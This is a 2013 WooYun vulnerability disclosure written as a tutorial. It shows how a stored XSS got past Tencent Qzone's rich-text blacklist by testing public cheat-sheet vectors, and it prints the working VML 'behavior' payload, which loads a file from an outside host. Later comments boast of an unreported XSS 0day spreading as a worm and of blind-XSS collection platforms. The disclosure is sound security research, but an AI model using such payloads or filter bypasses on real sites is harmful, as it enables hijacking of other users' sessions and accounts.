当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016779

漏洞标题:[腾讯实例教程] 那些年我们一起学XSS - 20. 存储型XSS入门 [套现绕过富文本]

相关厂商:腾讯

漏洞作者: 心伤的瘦子

提交时间:2013-01-01 09:05

修复时间:2013-02-15 09:05

公开时间:2013-02-15 09:05

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-01: 细节已通知厂商并且等待厂商处理中
2013-01-04: 厂商已经确认,细节仅向厂商公开
2013-01-14: 细节向核心白帽子及相关领域专家公开
2013-01-24: 细节向普通白帽子公开
2013-02-03: 细节向实习白帽子公开
2013-02-15: 细节向公众公开

简要描述:

很多应用含有富文本内容,这类应用最典型的特征是具有编辑器,例如:博客日志,邮箱等。这类应用往往允许使用一定的HTML代码。为了在用户体验和安全之间寻找平衡,各种厂商可能采用了不尽相同的办法。但是总体来说,有2类。
第1类我们称为白名单,即:只允许使用白名单内的合法HTML标签,例如IMG。其它均剔除。例如:百度贴吧回帖时候的代码过滤方式。
第2类我们称为黑名单,即:厂商会构建一个有危害的HTML标签、属性列表,然后通过分析用户提交的HTML代码,剔除其中有害的部分。 如:QQ邮箱的发邮件时的过滤方式。
白名单要安全得多,而黑名单的方式则经常会被绕过。
绕过的技巧也有很多,我们可以从最没技术含量的开始说起!! 本节将以QQ空间/QQ校友的日志功能为例来说明,什么是“套现绕过富文本”!
注意:本节说的“套现”,不是与“钱”有关的;在这里的含义是:“套用现成的XSS代码”。

详细说明:

1. 新手平时测试XSS时,经常会用到<script>alert(1)</script>到处插入,看效果。
2. 这种做法,在某些反射型XSS,或者你运气好的时候,确实能碰到。但是如果拿到QQ空间日志里去插入。嗯,后果一定会很悲壮,被过滤的毛都没有了。。
3. 这是为什么呢?因为<script>在腾讯的黑名单中,被过滤是理所当然的。
4. 试想,如果我们找到一个不在腾讯黑名单中的XSS代码,岂不是就可以成功在日志里执行XSS了么?
5. 有的人会问了。。哪里去找啊?? 方法有2种:
5.1 你足够牛,自己去发现。
5.2 已经有大牛为我们准备了很好的资料,去里面翻。
6. 我不够牛,所以我只能去大牛的资料里翻咯。
这里我翻的是 @sogili 维护的 http://html5sec.org/ ,里面有很多哦

100.jpg


7. 然后我就开始按照下面的流程慢慢测试。
先进QQ空间,发表一个日志,然后编辑日志,同时抓包。

99.jpg


修改抓包内容后,这里修改的是日志内容。提交修改后的数据包!
然后我们来看看日志里的源代码里,我们提交的XSS代码是否被过滤。

101.jpg


8. 这里我们就不说失败的了,直接说成功的部分。
我们提交以下代码:

<vmlframe xmlns="urn:schemas-microsoft-com:vml" style="behavior:url(#default#vml);position:absolute;width:100%;height:100%" src="http://itsokla.duapp.com/shouzi.vml#xss"></vmlframe>


然后看看源代码的输出:

102.jpg


可以看到,这个XSS代码完全没过滤。
9. 我们可以看到XSS的效果。鼠标移到日志上,即会触发XSS代码。

110.jpg


10. 很简单,对吧? 但是有以下问题我们要注意!!
10.1 使用代码前,先自己在本地试下,是否能执行!搞清楚你所使用的XSS代码的原理是什么!
10.2 搞清楚XSS代码的适用范围:如:在什么浏览器的什么版本之下才能使用,是否需要用户交互等。
10.3 注意平时对此类代码的搜集与整理。

漏洞证明:

见详细说明!

修复方案:

过滤 behavior, 和你们修复邮箱里相同问题的方法一样即可。

版权声明:转载请注明来源 心伤的瘦子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-01-04 17:41

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-01-01 09:34 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    新年快乐,瘦子。。。

  2. 2013-01-01 09:34 | 蓝风 ( 普通白帽子 | Rank:125 漏洞数:25 | 崬汸慾哓 嗼檤焄垳皁 沓猵圊屾亾沬荖 颩憬...)

    新年围观

  3. 2013-01-01 09:50 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    新年围观,坐等公开

  4. 2013-01-01 09:52 | txcbg ( 普通白帽子 | Rank:391 漏洞数:53 | 说点什么呢?)

    大家新年快乐!

  5. 2013-01-01 10:54 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @鬼魅羊羔 新年快乐 机油们

  6. 2013-01-01 11:26 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @心伤的瘦子 老湿,你开始发高危的咯~哈哈,这是给企鹅的新年礼物么?

  7. 2013-01-01 12:42 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    @疯子 @txcbg @rasca1 @蓝风 @鬼魅羊羔 @se55i0n 新年快乐

  8. 2013-01-01 12:43 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @心伤的瘦子 老湿 可否私信个联系方式 想请教点问题

  9. 2013-01-01 12:51 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @心伤的瘦子 老湿,期待你企鹅之后的续集(新浪、百度、网易、搜狐...)

  10. 2013-01-01 15:04 | 半世倾尘 ( 路人 | Rank:29 漏洞数:8 | 努力)

    看不了

  11. 2013-01-01 15:46 | cnhello ( 路人 | Rank:0 漏洞数:1 | 小菜一枚,学习中。。。)

    新年快乐

  12. 2013-01-01 17:06 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    顶。

  13. 2013-02-04 20:20 | Csser ( 路人 | Rank:11 漏洞数:6 )

    新年快乐- -

  14. 2013-02-07 16:08 | Alien ( 路人 | Rank:3 漏洞数:1 | 如果疯狂是一种错误,下一句?)

    新年快乐

  15. 2013-02-15 11:33 | 正在输入 ( 路人 | Rank:6 漏洞数:1 | 一直在磨蹭,一直在输入。。。。。。\0)

    墨迹墨迹。。。直接抗个锤子把腾讯机房砸了吧。。。你应该把所有漏洞都集中在节假日提交·~

  16. 2013-04-21 15:42 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    @心伤的瘦子 大牛求一份xss代码列表

  17. 2013-10-13 12:24 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    瘦子太帅了

  18. 2015-02-02 17:08 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    牛子 好牛叉

  19. 2015-04-26 15:56 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    666666

  20. 2015-05-03 12:01 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 哎 哥们 你也在啊 ,贴吧里咱俩聊冷少,我是那个家伙

  21. 2015-05-05 16:42 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 哦哦你呀!话说冷少他乌云id是什么你知道吗?我上次听幽灵网安站长说他的乌云漏洞都是偷来的,我想去看看他都偷了什么漏洞←_←

  22. 2015-05-05 23:07 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 我也不知道 他飞黄腾达了 我也不想找他了

  23. 2015-05-06 11:37 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 他飞黄腾达了?此话怎讲?

  24. 2015-05-06 14:08 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 他有钱了。。对了 昌维阿,你的Q我加不上啊

  25. 2015-05-06 21:09 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 你群里面找我吧,QQ满员了。。。话说他中彩票了还是做黑产了?怎么突然有钱了

  26. 2015-05-07 16:13 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 = =他去的阿里巴巴,提交漏洞赚的

  27. 2015-05-08 20:00 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 转了多少?我上次看到补天一个百度高危sql注入,奖金三百,,,

  28. 2015-05-09 05:14 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 我不太清楚、他获得了一个证书。看着就眼红

  29. 2015-05-09 10:36 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 没啥好眼红的,也有人踩着狗屎运了天天盲打xss成功一大片,我盲打了这么多到现在xss平台接收数量还是0,我也没眼红啥。

  30. 2015-05-09 22:40 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 = =我挖了一个0day,XSS的,现在蠕虫满地飞。~ 我平台起码每天+10

  31. 2015-05-10 20:32 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 敢不敢提交←_←

  32. 2015-05-19 15:41 | Maxson ( 路人 | Rank:21 漏洞数:8 | 莫找借口失败,只找理由成功!)

    @昌维 我给我表弟了。让他提交后进wooyun

  33. 2015-05-22 00:26 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    @Maxson 机智